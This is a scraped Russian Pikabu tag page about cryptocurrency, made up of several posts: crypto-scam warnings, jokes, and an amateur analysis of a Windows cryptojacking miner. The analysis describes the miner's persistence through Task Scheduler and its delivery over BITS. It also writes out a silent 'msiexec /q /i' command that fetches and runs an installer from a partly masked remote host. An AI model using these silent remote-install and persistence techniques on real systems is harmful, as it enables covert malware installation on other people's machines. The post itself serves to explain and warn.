криптовалюта

Постов: 22 Рейтинг: 75615
6053

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Развернуть

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.
Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

7753

"Раздача" криптовалюты от Павла Дурова

Развернуть

Недавно Дуров написал в свой твиттер данный пост:

Перевод от меня: "Благодарим @Apple и @tim_cook за то, что разрешили нам обновить Телеграм на устройствах миллионов пользователей, несмотря на недавние издержки."


И все бы ничего, но... Посмотрите на комментарии под этим твитом:

Перевод от меня: 1. "Поэтому, мы начали новый конкурс/розыгрыш [криптовалюты] в честь этой хорошей новости! *ссылка на пост в телеграфе где указаны сайты розыгрыша биткоинов и ETH*",

2: "Каждый может участвовать!",

3. "Мы знаем про проблемы у пользователей из Ирана и работает над их решением"


Что это? Дуров разыгрывает криптовалюту? Даже галочка есть!


Давайте зайдем на этот волшебный сайт с халявой!

Перевод от меня: Для подтверждения своего адреса кошелька — просто отправьте 0.5 - 10 ETH (1 ETH (Ethereum) = 18067 рублей) на кошелек ниже и получите 5 - 100 ETH (100 ETH = 3613519 рублей) назад!


Надо же, какая халява! Но...

Давайте посмотрим на юзернейм (@JarydWilson) нашего халявщика-Паши:

Что-то не похоже на @durov...


И зайдя на страницу данного аккаунта все стало ясно :)

Мошенники угоняют аккаунты мелких знаменитостей с галочкой, после чего переименовывают их в Павла Дурова и идут к нему в комменты с "халявой" :)


В комментариях дальше появился (естественно тоже фейковый) Виталик Бутерин (создатель Ethereum) и зовет всех поддержать конкурс Павла:

Перевод от меня:
1. "Спасибо тебе, Павел, за то что выбрал наш сайт для проведения такого большого розыгрыша!"

2. "Розыгрыш все еще идет, каждый может участвовать!

*ссылка на сайт мошенников*

Поспешите!"

Вот такие дела. А галочка даже меня ввела в заблуждение сначала, только потом понял, что надо посмотреть на юзернейм. :)

2200

А вы говорили медицина у нас отсталая...

Развернуть
Электронная регистратура сахалинского минздрава тайно майнила криптовалюту на компьютерах посетителей.
Пруф: https://sakhalin.info/news/145342
2538

1500 книг на Google Disk!

Развернуть
1500 книг на Google Disk!
Выражаем огромную благодарность @Rugus52 за предоставленные им книги.

Мы решили ее перезалить на Google Disk, так как в курсе о проблеме с доступом к Yandex Disk у жителей Украины, а также дополнить ее своей библиотекой, где уже более 1500 книг по разным направлениям - от саморазвития до криптовалют. Вся наша библиотека находится в блокноте на облаке. Переходите, качайте и не теряйте время попросту! :)
2161

Честный майнер

Развернуть
Зашёл я сегодня на сайт одного онлайн кинотеатра, спустился в самый низ страницы и увидел странную плашку с нарастающими цифрами, думаю, что это может быть. Хммм, 4 ядра, Хэши какие-то, ради интереса глянул в Диспетчер и прибалдел)))) Майнер, собака!
Честный майнер
Но при наведении курсора появляется кнопка паузы, процесс действительно останавливается, и на том спасибо)))
Будьте осторожны.
Честный майнер
2576

Биткойн продолжает ломать судьбы

Развернуть
Студент Омского Университета решил стать криптоинвестором и начал искать, где можно прикупить битка. Парень решил не тупить, а залез сразу на Авито. Зачем покупать новый биткойн, если б/у - дешевле?


Парень нашел биткойн за 60 000 рублей, связался с продавцом и перевел ему деньги. Биткойн ему обещали перевести через час, но, как вы догадались, богачом он так и не стал. Полиция завела уголовное дело и сейчас отслеживает перевод денег.


Уровень криптоинвестора - криптомич.
9292

Коротко обо мне

Развернуть
инфа 100%
Коротко обо мне
858

У москвича отобрали 15 миллионов рублей при попытке поменять их на биткоины

Развернуть
У москвича отобрали 15 миллионов рублей при попытке поменять их на биткоины
По информации пресс-службы ГУМВД по Москве, в полицию обратился гражданин, который сообщил, что в офисе в Малом Черкасском переулке десять человек отобрали у него более 15 миллионов рублей.

Полицейским удалось установить, что гражданин совместно со своим биржевым брокером прибыл на встречу, где хотел купить криптовалюту. Во время расчетов один из участников встречи кому-то позвонил, после чего в помещение офиса вошли 6-8 человек крепкого телосложения. Под угрозой физического насилия, пояснив, что мужчина, с которым они встретились, — мошенник, увели его и забрали деньги, после чего скрылись. Полицейские ведут проверку по данному факту.

https://www.vesti.ru/doc.html?id=2955255#
993

Позабыл про биткоины.

Развернуть
Статья от 2013 года

Четыре года назад, в 2009, норвежский студент Кристофер Кох потратил на криптовалюту около 27 долларов. Купил немного чисто поржать — как раз тогда Кристофер писал научную работу по криптографии. Биткоины куплены, работа сдана — время отдыхать и двигаться дальше. Про свои вложения Кристофер мигом подзабыл.


Переместимся в апрель 2013 года, когда курс биткоинов начал взлетать. Тогда вся мировая пресса начала писать про эту электронную валюту, и Кох вдруг вспомнил о своих сбережениях. Открыв свой счёт, Кристофер обнаружил 5000 биткоинов на сумму около 885 тысяч долларов.


Обналичив 20% от этой суммы, Кох смог купить квартиру в одном из богатых районов Осло.


Его спутница жизни всегда скептично относилась к обмену настоящих денег на виртуальные. Теперь ей пришлось переменить своё мнение (по пути из одной из ванных комнат в одну из столовых, очевидно). «Раньше она жаловалась на то, что я постоянно покупаю кучу технических приспособлений, которыми никогда не пользуюсь, а теперь ещё и фальшивые деньги какие-то», — говорит Кох. «Теперь она говорит, что мне можно разрешить покупать всё, что мне вздумается»
Позабыл про биткоины.
Слишком грустно выглядит для миллионера, но достаточно весело для подкаблучника.

Konstantin Panphilov  ©
2979

В золотую лихорадку больше всего заработает продавец инструментов для добычи

Развернуть
В золотую лихорадку больше всего заработает продавец инструментов для добычи
1192

Как я поймал и обнаружил скрытый майнер

Развернуть
Всем привет. Вот и я решил зарегаться дабы поведать Вам одну историю которая произошла со мной на днях. Давеча сидел я вечером в одной своей любимой игре, играл и тут заметил, что игра довольно сильно местами лагает. Да ладно, видно опять не прогрузились текстуры полностью подумал я. Доиграл и уже было собирался спать, вышел из игры и через 5 минут заметил, что куллер на процессоре не сбавляет обороты. Странно, комп в простое, никаких прог использующих проц у меня нет. Как и любой другой пользователь открыл я диспетчер задач и увидел лишь нагрузку в пару процентов, но мой внутренний голос говорил мне, что-то здесь не то. Открываю аиду и вижу нагрузку на два ядра в 100%, открываю диспетчер задач, нагрузки нет, а в аиде она падает до нуля. Тут я понимаю, что словил скрытый майнер. Откуда я это понял? Когда-то интересовался этой темой, конечно не обошлось без разных форумов где видел продаванов предлагающих свои приватные сборки среди функций которых были и такие как скрытие от диспетчера задач, восстановления майнера после удаления. То есть при запуске диспетчера задач процесс майнера закрывался, а пользователь увидев, что нет никакой нагрузки, закрывал диспетчер и даже не подозревал, что после этого майнер снова начинал свою работу. И так нужно было остановить майнер и временно локализировать его пока я не вывел заразу с компа. А для этого его надо найти. Обычный диспетчер не помогает увидеть процесс майнера, процесс хакер тоже поскольку это диспетчер номер один после стандартного. Обычно создатель майнера задает ему завершение работы только при запуске стандартного диспетчера и парочки сторонних популярных. Я использую еще один диспетчер, System Explorer, отличная шутка. Запустив его я сразу глянул в аиду, нагрузка не упала, значит этот диспетчер майнер не палит. Просмотрев процессы я увидел, что комп мой грузит процесс helper.exe, бегло посмотрев в инете, что это файл винды на запуск доверенных программ, я открыл подпроцессы этого процесса и обнаружил еще один с абракадаброй в названии и расширением .tmp, то есть временный файл, немного удивил тот факт, что именно он грузил проц когда я открыл всю ветку. После его убийства я не удивился, что создался и запустился другой tmp-шник и тут же дал нагрузку на проц. Открыв папку с файлом helper я увидел пустоту, быстро сообразив, что раз скрытые папки и файлы включены, а файла я не вижу, значит у него атрибут системного. Быстренько создав батник и прописав в нем attrib -s -h до пути файла я его наконец увидел, затем убил процесс и тут же удалил, куллер потихоньку начал снижать обороты, нагрузка упала, далее пришлось возиться со скриптами в AVZ и на всякий случай просканить комп одноразовым сканировщиком. Удаляя этот файл я мельком увидел, что дата его изменения две недели назад, а винда стоит давно, вероятно он был подставлен вместо оригинально хелпера винды или просто так назывался дабы не вызвать подозрений. Надеюсь я снес все, но с тех пор веду круглосуточный мониторинг и все тихо. Кто-то скажет "надо вовремя обновлять базы данных антивируса", но не забывайте, что многие антивирусы не распознают простенький майнер как вирус, так как он не вредит компьютеру, а лишь заимствует его ресурсы для своих нужд. А если это еще и грамотно сделанный майнер и хорошо закриптованный, то антивирусы не спалят его вообще в ближайшие 2-3 недели начиная с момента сборки. Видеокарту майнер не задел, видно майнил только на проце. На этом все, берегите свое железо от недобросовестных майнеров.
4016

Чаевые менеджера по продажам

Развернуть
Чаевые менеджера по продажам
Смотрели сегодня ноуты в Техномаркете. Обратили внимание на очень горячую клавиатуру. В процессах:
Чаевые менеджера по продажам
3623

Началось

Развернуть
Началось
2215

Мошенники Глобал Инвест. Теперь и на криптовалюте

Развернуть
Сижу вчера вечером за компьютером, никого не трогаю, как раздается телефонный звонок. На дисплее высвечивается номер +74950985025. О, привет, Москва! Truecaller определил номер как "Spam". Беру трубку, на том конце какой-то парень с украинским или беларусским акцентом представляется (уже не помню как имя), компания "Глобал-Инвест".

Сразу вспомнилось как в прошлом году они же мне звонили с предложением заработка на бинарных опционах. Основной посыл был "дайте нам денег и будете зарабатывать ничего не делая". На резонный вопрос чего сами так не зарабатывают, а звонят всем подряд, ответили, что сами и так уже все почти миллионеры и обзванивают, чтобы больше людей об этом узнали. Пару раз даже проделывали трюк то ли из "Бойлерной", то ли из "Волк с Уолл стрит" - акцентировали внимание на шуме в трубке, типа из торгового зала звонят и там идет жаркая торговля этими самыми опционами. Только связь была тогда очень хорошая и отчетливо было слышно, что это обычный колл-центр в котором работают не меньше двух десятков таких вот обзвонщиков с минимальной изоляцией друг от друга и на самом дешевом оборудовании без фильтра шумов. Т.к. я сам в прошлом занимался активными продажами, то было любопытно посмотреть, как этих менеджеров готовят к звонкам. В итоге прокатил их по таким возражениям, что вскоре с той стороны парень сменился на девушку-руководителя и разговор длился более часа. Подготовка у них, могу сказать, серьезная. Простым "не интересно" не отделаться, будут продолжать разговор до последнего. Не знаю, таких шустрых сразу берут или подготовлен четкий скрипт с максимальным количеством вариантов возражений, но держались стойко и почти на все могли парировать.

И вот профессиональное любопытство снова взяло вверх. В этот раз разговор начался с вопроса знаю ли я, что такое криптовалюты. Заявили, что у них собственная криптовалюта, у которой уже 100000 пользователей, единица стоит $5, а скоро выходят на биржу и цена поднимется до $30. Всю информацию можно найти на их сайте (да я таких сайтов сам могу наклепать сколько угодно, а к ним еще и форумы с положительными отзывами). Предложение было купить. Не майнить самому, не вложиться в их облачный майнинг, а именно купить. Учитывая техническую неграмотность населения и случайность аудитории в их списках, имхо, но было бы проще заявить, что у них облачный майнинг и завлекать лохов туда, чем предлагать купить какую-то неизвестную хуету, взявшуюся неизвестно откуда и зачем. К сожалению, в этот раз связь была отвратительной. Так и не получилось расспросить поподробнее, чем они ее обеспечивают, сколько в обороте, кто и как добывает и прочие умности.

Подробнее о том, что такое Глобал Инвест можно легко найти в гугле. Если кратко, то контора берет деньги и якобы пускает их в оборот на бирже на покупку акций, опционов, криптовалюты и прочего, обещая вкладчику несметные богатства. А по факту о какой-то там бирже и торговле на ней они знают только из собственных методичек. Естественно, люди ничего не получают, ни прибыли, ни собственного вклада.

Вот тут рассказывается как руководители этой конторы Агабекян и Степанов еще в 2015 году получили 10 и 11 лет колонии общего режима за мошенничество в особокрупном размере.
https://pravo.ru/news/view/118313/

А вот скрин с сайта Хамовнического районного суда Москвы https://hamovnichesky--msk.sudrf.ru/
Мошенники Глобал Инвест. Теперь и на криптовалюте
Если почитать дела, то можно обнаружить, что многие вкладчики не просто дают им денег, а компания постоянно уговаривает их продлить договор под предлогом повышения итогового процента прибыли. Некоторые даже при продлении вкидывают туда еще денег.

Вот так, руководство в колонии, а денежки капают. Конторку прикрывать почему-то никто не спешит, хотя деятельность явно мошенническая.

Прошу поднять пост в ТОП, дабы больше пикабушников это увидели и слали таких звонящих далеко и надолго. А может и найдется тот, кто отправит их к их же руководству.
Коммент для минусов добросовестно оставляю.
3244

Не показывай его никому, купи сейф...

Развернуть
... и на последнем развороте курс акций Nvidia и цены на видеокарты
Не показывай его никому, купи сейф...
4235

Когда решил стать майнером

Развернуть
Когда решил стать майнером
5442

Скоро на Авито

Развернуть
Скоро на Авито
4282

Ставка на всё!

Развернуть
Ставка на всё!
6168

Вспоминаю каждый раз, когда речь заходит о "сроках жизни" биткоинов

Развернуть
Вспоминаю каждый раз, когда речь заходит о
Эту историю я впервые услышал на уроке экономики в школе. Думаю, будет актуально ещё много лет
1681

Когда у жены сгорела видяха, и ты полез смотреть цены на новые...

Развернуть
Когда у жены сгорела видяха, и ты полез смотреть цены на новые...